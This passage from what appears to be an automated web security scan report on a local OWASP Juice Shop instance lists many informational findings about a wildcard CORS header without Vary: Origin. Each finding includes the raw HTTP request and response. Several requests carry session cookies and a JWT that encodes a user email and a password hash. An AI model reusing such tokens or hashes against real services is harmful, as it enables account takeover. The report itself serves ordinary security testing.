    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/ng-file-upload/ng-file-upload.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 05 Nov 2016 04:30:52 GMT
    ETag: W/"9277-15832c0e460"
    Content-Type: application/javascript
    Content-Length: 37495
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! 12.2.13 */
    !window.XMLHttpRequest||window.FileAPI&&FileAPI.shouldLoad||(window.XMLHttpRequest.prototype.setRequestHeader=function(a){return function(b,c){if("__setXHR_"===b){var d=c(this);d instan
    ...[SNIP]...
    15.53. http://192.168.61.143:3000/bower_components/ngclipboard/dist/ngclipboard.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/ngclipboard/dist/ngclipboard.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/ngclipboard/dist/ngclipboard.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 26 Feb 2016 02:29:26 GMT
    ETag: W/"280-1531b68cb70"
    Content-Type: application/javascript
    Content-Length: 640
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*! ngclipboard - v1.1.1 - 2016-02-26
    * https://github.com/sachinchoolur/ngclipboard
    * Copyright (c) 2016 Sachin; Licensed MIT */
    !function(){"use strict";var a,b,c="ngclipboard";"object"==typeof modu
    ...[SNIP]...
    15.54. http://192.168.61.143:3000/bower_components/qrcode-generator/js/qrcode.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/qrcode-generator/js/qrcode.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/qrcode-generator/js/qrcode.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Tue, 29 Mar 2016 13:26:04 GMT
    ETag: W/"afce-153c28d75e0"
    Content-Type: application/javascript
    Content-Length: 45006
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    //---------------------------------------------------------------------
    //
    // QR Code Generator for JavaScript
    //
    // Copyright (c) 2009 Kazuhiko Arase
    //
    // URL: http://www.d-project.com/
    //
    // Licens
    ...[SNIP]...
    15.55. http://192.168.61.143:3000/bower_components/underscore/underscore.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/underscore/underscore.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/underscore/underscore.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Thu, 02 Apr 2015 15:32:01 GMT
    ETag: W/"ceb7-14c7ac2ad68"
    Content-Type: application/javascript
    Content-Length: 52919
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    // Underscore.js 1.8.3
    // http://underscorejs.org
    // (c) 2009-2015 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
    // Underscore may be freely distributed under th
    ...[SNIP]...
    15.56. http://192.168.61.143:3000/css/app.css

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /css/app.css

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /css/app.css HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/css,*/*;q=0.1
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"1a5-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"1a5-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.57. http://192.168.61.143:3000/dist/juice-shop.min.js

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    15.58. http://192.168.61.143:3000/i18n/en.json

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /i18n/en.json

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /i18n/en.json HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"1159-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"1159-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.59. http://192.168.61.143:3000/i18n/en_US.json

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /i18n/en_US.json

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /i18n/en_US.json HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"2639-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.60. http://192.168.61.143:3000/public/images/JuiceShop_Logo.svg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/JuiceShop_Logo.svg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/JuiceShop_Logo.svg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"9746-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"9746-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.61. http://192.168.61.143:3000/public/images/carousel/1.jpg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/1.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/1.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"15718-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"15718-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.62. http://192.168.61.143:3000/public/images/carousel/2.jpg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/2.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/2.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"bbc6-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"bbc6-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.63. http://192.168.61.143:3000/public/images/carousel/3.jpg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/3.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/3.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"e3aa-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"e3aa-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.64. http://192.168.61.143:3000/public/images/carousel/4.jpg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/4.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/4.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"18292-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"18292-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.65. http://192.168.61.143:3000/public/images/carousel/5.jpg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/5.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/5.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"cc28-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"cc28-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.66. http://192.168.61.143:3000/public/images/carousel/6.jpg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/6.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/6.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"1a365-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"1a365-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.67. http://192.168.61.143:3000/public/images/carousel/7.jpg

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/carousel/7.jpg

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/carousel/7.jpg HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close
    If-Modified-Since: Wed, 28 Dec 2016 00:59:55 GMT
    If-None-Match: W/"a83f-15942f0cef8"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"a83f-15942f0cef8"
    Date: Sun, 15 Jan 2017 21:40:26 GMT
    Connection: close

    15.68. http://192.168.61.143:3000/public/images/products/%7B%7Bproduct.image%7D%7D

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/%7B%7Bproduct.image%7D%7D

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

